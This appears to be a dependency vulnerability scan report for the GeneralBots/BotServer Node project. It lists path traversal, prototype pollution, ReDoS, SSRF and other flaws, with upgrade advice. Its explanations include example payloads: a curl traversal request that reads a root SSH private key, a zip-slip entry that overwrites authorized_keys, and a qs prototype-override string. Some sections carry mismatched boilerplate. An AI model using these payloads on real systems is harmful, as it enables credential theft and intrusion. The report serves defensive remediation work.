GeneralBots/BotServer

General Bot Community Edition open-core server.

Vulnerabilities

13 via 34 paths

Dependencies

792

Source

GitHub

Commit

68ffecd5

Find, fix and prevent vulnerabilities in your code.

Severity
  • 4
  • 4
  • 5
Status
  • 13
  • 0
  • 0

high severity
new

Directory Traversal

  • Vulnerable module: adm-zip
  • Introduced through: textract@2.5.0

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 textract@2.5.0 epub2@1.3.4 adm-zip@0.4.16

Overview

adm-zip is a JavaScript implementation for zip data compression for NodeJS.

Affected versions of this package are vulnerable to Directory Traversal. It could extract files outside the target folder.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade adm-zip to version 0.5.2 or higher.

References

high severity

Prototype Pollution

  • Vulnerable module: extend
  • Introduced through: swagger-client@2.1.18

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 swagger-client@2.1.18 superagent@1.8.5 extend@3.0.0
    Remediation: Upgrade to swagger-client@2.1.20.

Overview

extend is a port of the classic extend() method from jQuery.

Affected versions of this package are vulnerable to Prototype Pollution. Utilities function can be tricked into modifying the prototype of "Object" when the attacker control part of the structure passed to these function. This can let an attacker add or modify existing property that will exist on all object.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade extend to version 2.0.2, 3.0.2 or higher.

References

high severity
new

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: marked
  • Introduced through: marked@1.2.5

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 marked@1.2.5
    Remediation: Upgrade to marked@2.0.0.

Overview

marked is a low-level compiler for parsing markdown without caching or blocking for long periods of time.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). 3 or more groups of odd and even numbered consecutive underscores (___) followed by a character causes extended processing.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade marked to version 2.0.0 or higher.

References

high severity

Prototype Override Protection Bypass

  • Vulnerable module: qs
  • Introduced through: swagger-client@2.1.18

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 swagger-client@2.1.18 superagent@1.8.5 qs@2.3.3
    Remediation: Upgrade to swagger-client@2.1.20.

Overview

qs is a querystring parser that supports nesting and arrays, with a depth limit.

Affected versions of this package are vulnerable to Prototype Override Protection Bypass. By default qs protects against attacks that attempt to overwrite an object's existing prototype properties, such as toString(), hasOwnProperty(),etc.

From qs documentation:

By default parameters that would overwrite properties on the object prototype are ignored, if you wish to keep the data from those fields either use plainObjects as mentioned above, or set allowPrototypes to true which will allow user input to overwrite those properties. WARNING It is generally a bad idea to enable this option as it can cause problems when attempting to use the properties that have been overwritten. Always be careful with this option.

Overwriting these properties can impact application logic, potentially allowing attackers to work around security controls, modify data, make the application unstable and more.

In versions of the package affected by this vulnerability, it is possible to circumvent this protection and overwrite prototype properties and functions by prefixing the name of the parameter with [ or ]. e.g. qs.parse("]=toString") will return {toString = true}, as a result, calling toString() on the object will throw an exception.

Example:

qs.parse('toString=foo', { allowPrototypes: false })
// {}

qs.parse("]=toString", { allowPrototypes: false })
// {toString = true} <== prototype overwritten

For more information, you can check out our blog.

Disclosure Timeline

  • February 13th, 2017 - Reported the issue to package owner.
  • February 13th, 2017 - Issue acknowledged by package owner.
  • February 16th, 2017 - Partial fix released in versions 6.0.3, 6.1.1, 6.2.2, 6.3.1.
  • March 6th, 2017 - Final fix released in versions 6.4.0,6.3.2, 6.2.3, 6.1.2 and 6.0.4

    Remediation

    Upgrade qs to version 6.0.4, 6.1.2, 6.2.3, 6.3.2 or higher.

    References

  • GitHub Commit
  • GitHub Issue

medium severity

Server-Side Request Forgery (SSRF)

  • Vulnerable module: axios
  • Introduced through: botbuilder@4.11.0, botframework-connector@4.11.0 and others

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botbuilder@4.11.0 axios@0.19.2
    Remediation: Upgrade to botbuilder@4.11.1.
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
    Remediation: Upgrade to botframework-connector@4.11.1.
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botbuilder@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
    Remediation: Upgrade to botbuilder@4.11.1.
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botbuilder-ai@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
    Remediation: Upgrade to botbuilder-ai@4.11.1.
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder@4.11.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botbuilder@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
    Remediation: Upgrade to botbuilder@4.11.1.
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder-ai@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder-azure@4.11.0 botbuilder@4.11.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botbuilder@4.11.0 botbuilder-core@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
    Remediation: Upgrade to botbuilder@4.11.1.
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botbuilder-dialogs@4.11.0 botbuilder-core@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
    Remediation: Upgrade to botbuilder-dialogs@4.11.1.
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botbuilder-ai@4.11.0 botbuilder-core@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
    Remediation: Upgrade to botbuilder-ai@4.11.1.
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder-azure@4.11.0 botbuilder@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder@4.11.0 botbuilder-core@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botbuilder-ai@4.11.0 botbuilder-dialogs@4.11.0 botbuilder-core@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
    Remediation: Upgrade to botbuilder-ai@4.11.1.
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder-dialogs@4.11.0 botbuilder-core@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder-ai@4.11.0 botbuilder-core@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder-azure@4.11.0 botbuilder@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder-azure@4.11.0 botbuilder@4.11.0 botbuilder-core@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder-ai@4.11.0 botbuilder-dialogs@4.11.0 botbuilder-core@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 ibm-watson@5.7.1 ibm-cloud-sdk-core@2.4.4 axios@0.18.1
    Remediation: Upgrade to ibm-watson@6.0.0.

Overview

axios is a promise based HTTP client for the browser and node.js.

Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). An attacker is able to bypass a proxy by providing a URL that responds with a redirect to a restricted host or IP address.

Remediation

Upgrade axios to version 0.21.1 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS )

  • Vulnerable module: marked
  • Introduced through: textract@2.5.0

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 textract@2.5.0 marked@0.6.2

Overview

marked is a low-level compiler for parsing markdown without caching or blocking for long periods of time.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS ). The em regex within src/rules.js file have multiple unused capture groups which could lead to a denial of service attack if user input is reachable.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade marked to version 1.1.1 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: marked
  • Introduced through: textract@2.5.0

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 textract@2.5.0 marked@0.6.2

Overview

marked is a low-level compiler for parsing markdown without caching or blocking for long periods of time.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The package may take exponentially quadratic time when parsing malformed input due to the _label subrule using back ticks. This vulnerability was introduced in release 0.4.0 of the package.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade marked to version 0.7.0 or higher.

References

medium severity

Information Exposure

  • Vulnerable module: superagent
  • Introduced through: swagger-client@2.1.18

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 swagger-client@2.1.18 superagent@1.8.5
    Remediation: Upgrade to swagger-client@3.0.1.

Overview

superagent is a Small progressive client-side HTTP request library, and Node.js module with the same API, supporting many high-level HTTP client features.

Affected versions of this package are vulnerable to Information Exposure due to sending the contents of Authorization to third parties.

Remediation

Upgrade superagent to version 3.8.1 or higher.

References

low severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: harb
  • Introduced through: textract@2.5.0

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 textract@2.5.0 j@0.4.3 harb@0.0.7

Overview

harb is a parser and writer for various spreadsheet formats.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. This can cause an impact of about 10 seconds matching time for data 40k characters long.

Disclosure Timeline

  • Feb 19th, 2018 - Initial Disclosure to package owner
  • Feb 19th, 2018 - Initial Response from package owner
  • Feb 21th, 2018 - Fix issued
  • Feb 22th, 2018 - Vulnerability published

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

There is no fix for harb, as this package is now maintained as xlsx.

References

low severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: mime
  • Introduced through: swagger-client@2.1.18

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 swagger-client@2.1.18 superagent@1.8.5 mime@1.3.4
    Remediation: Upgrade to swagger-client@2.1.20.

Overview

mime is a comprehensive, compact MIME type module.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). It uses regex the following regex /.*[\.\/\\]/ in its lookup, which can cause a slowdown of 2 seconds for 50k characters.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade mime to version 1.4.1, 2.0.3 or higher.

References

low severity

Denial of Service (DoS)

  • Vulnerable module: superagent
  • Introduced through: swagger-client@2.1.18

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 swagger-client@2.1.18 superagent@1.8.5
    Remediation: Upgrade to swagger-client@3.0.1.

Overview

superagent is a Small progressive client-side HTTP request library, and Node.js module with the same API, supporting many high-level HTTP client features.

Affected versions of this package are vulnerable to Denial of Service (DoS). It uncompresses responses in memory, and a malicious user may send a specially crafted zip file which will then unzip in the server and cause excessive CPU consumption. This is also known as a Zip Bomb.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

